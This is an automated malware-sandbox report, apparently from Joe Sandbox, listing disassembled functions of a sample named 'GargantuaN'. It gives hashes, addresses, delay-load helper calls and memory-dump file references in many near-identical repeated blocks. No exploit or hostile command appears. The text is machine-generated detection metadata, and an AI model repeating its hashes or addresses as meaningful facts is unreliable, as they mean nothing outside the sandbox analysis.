                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: d8b2b856571ca292340c1f02d6370c3e0199a20e45194a616ed2a3d60634c40c
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: d8b2b856571ca292340c1f02d6370c3e0199a20e45194a616ed2a3d60634c40c
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: cc435344897bbf2d613591a017095b9d37e04e56cf6f55ad5f3fab8064067843
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: cc435344897bbf2d613591a017095b9d37e04e56cf6f55ad5f3fab8064067843
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 3b6b05ac4538ec92367510c95b80a8d16767be94476b8c9963cf3053673059de
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: 3b6b05ac4538ec92367510c95b80a8d16767be94476b8c9963cf3053673059de
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 8434583daaf2e3bd9c6f7b955825ec7ce556ecf26497222c1e7afa85722ff847
                                                        • Instruction ID: 0406648fe4858102057d098e0f8c802a982b10e5a8149ab9a3c05a5c6d26fbc9
                                                        • Opcode Fuzzy Hash: 8434583daaf2e3bd9c6f7b955825ec7ce556ecf26497222c1e7afa85722ff847
                                                        • Instruction Fuzzy Hash: 27A001EA2A9152BE314862516E07C3B431DC4C2B26330A52EF865A6591EC90584A19B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 36b68720f046198f02c27fd7c5ab63abaabf1b836828ba9a7f645e2b25e85064
                                                        • Instruction ID: 06d3c47baf0398ba0653f85e2aa3f595d30cf7a8302f4c3be7bbfdddd39a3e8d
                                                        • Opcode Fuzzy Hash: 36b68720f046198f02c27fd7c5ab63abaabf1b836828ba9a7f645e2b25e85064
                                                        • Instruction Fuzzy Hash: E1A001EA2A9152BE314862516E07C3B431DC4C6B62330A92EF856A6591E890584A19B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 2fe184eddbcd9a27163e6c57fd8713d097cacbb65785b58a69a2c70ffdb740b6
                                                        • Instruction ID: 06d3c47baf0398ba0653f85e2aa3f595d30cf7a8302f4c3be7bbfdddd39a3e8d
                                                        • Opcode Fuzzy Hash: 2fe184eddbcd9a27163e6c57fd8713d097cacbb65785b58a69a2c70ffdb740b6
                                                        • Instruction Fuzzy Hash: E1A001EA2A9152BE314862516E07C3B431DC4C6B62330A92EF856A6591E890584A19B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: ae9efc515ac3e0870fb20c0945aa85ec0c14349bf7d5b049919707b02f74f37d
                                                        • Instruction ID: 06d3c47baf0398ba0653f85e2aa3f595d30cf7a8302f4c3be7bbfdddd39a3e8d
                                                        • Opcode Fuzzy Hash: ae9efc515ac3e0870fb20c0945aa85ec0c14349bf7d5b049919707b02f74f37d
                                                        • Instruction Fuzzy Hash: E1A001EA2A9152BE314862516E07C3B431DC4C6B62330A92EF856A6591E890584A19B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: cc3fdc7cc90a41f0fad11f7d75a722c1fea8ce77bbc3989795dfc7470b1133bb
                                                        • Instruction ID: 06d3c47baf0398ba0653f85e2aa3f595d30cf7a8302f4c3be7bbfdddd39a3e8d
                                                        • Opcode Fuzzy Hash: cc3fdc7cc90a41f0fad11f7d75a722c1fea8ce77bbc3989795dfc7470b1133bb
                                                        • Instruction Fuzzy Hash: E1A001EA2A9152BE314862516E07C3B431DC4C6B62330A92EF856A6591E890584A19B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: f1422a8f8e5907020219d0840372642436c4d068d4d33ff6d2c5e30f83d46da5
                                                        • Instruction ID: 06d3c47baf0398ba0653f85e2aa3f595d30cf7a8302f4c3be7bbfdddd39a3e8d
                                                        • Opcode Fuzzy Hash: f1422a8f8e5907020219d0840372642436c4d068d4d33ff6d2c5e30f83d46da5
                                                        • Instruction Fuzzy Hash: E1A001EA2A9152BE314862516E07C3B431DC4C6B62330A92EF856A6591E890584A19B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E580
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: bf314098f21ab5582adb04463bdca086bee7a6a3c500479ba989ed36c0abdb59
                                                        • Instruction ID: 10511869b50de81eb6122bd7fe746875c609e74b9730ec91e79dc64b66c15424
                                                        • Opcode Fuzzy Hash: bf314098f21ab5582adb04463bdca086bee7a6a3c500479ba989ed36c0abdb59
                                                        • Instruction Fuzzy Hash: 0AA011EA2AC022BE300822A22C03C3B030CC0C0B20330A82EF80282080F880080808B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E580
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: ece90da1127bb054f10ae6b782a1feda3a77c01c43c1c289b3d61b57452da379
                                                        • Instruction ID: 10511869b50de81eb6122bd7fe746875c609e74b9730ec91e79dc64b66c15424
                                                        • Opcode Fuzzy Hash: ece90da1127bb054f10ae6b782a1feda3a77c01c43c1c289b3d61b57452da379
                                                        • Instruction Fuzzy Hash: 0AA011EA2AC022BE300822A22C03C3B030CC0C0B20330A82EF80282080F880080808B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: b2496eb0fb2252deb44312bb5af6bebf9f0e2cf9fd10945c5b4cd096f1aaf54f
                                                        • Instruction ID: 3404c67906004f8ab61e7f90c3964a15160b1f72c66a1c94867dda70a3dd903e
                                                        • Opcode Fuzzy Hash: b2496eb0fb2252deb44312bb5af6bebf9f0e2cf9fd10945c5b4cd096f1aaf54f
                                                        • Instruction Fuzzy Hash: 8DA011EA2A8002BE30082200AC03C3B030CC0C2F20330A82EF802C00C0F8800C0808B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 11a7c29cca6697c13cb9873cfa5d13b0b2782b0d66dce165df10158d95d789b0
                                                        • Instruction ID: 3404c67906004f8ab61e7f90c3964a15160b1f72c66a1c94867dda70a3dd903e
                                                        • Opcode Fuzzy Hash: 11a7c29cca6697c13cb9873cfa5d13b0b2782b0d66dce165df10158d95d789b0
                                                        • Instruction Fuzzy Hash: 8DA011EA2A8002BE30082200AC03C3B030CC0C2F20330A82EF802C00C0F8800C0808B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 8b21305d0c62cfa0459bacd2ceaa58febefb890a4d979b703ae8d136e8166838
                                                        • Instruction ID: 3404c67906004f8ab61e7f90c3964a15160b1f72c66a1c94867dda70a3dd903e
                                                        • Opcode Fuzzy Hash: 8b21305d0c62cfa0459bacd2ceaa58febefb890a4d979b703ae8d136e8166838
                                                        • Instruction Fuzzy Hash: 8DA011EA2A8002BE30082200AC03C3B030CC0C2F20330A82EF802C00C0F8800C0808B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E580
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 95dd0558ed3a995be87f110eb4115562451c7cdf9158b16db0fd10891576e30d
                                                        • Instruction ID: ae3db18a6361cb2485784fa5d2bd661440d6e0bb705d10b86e80cdb8cea94dd0
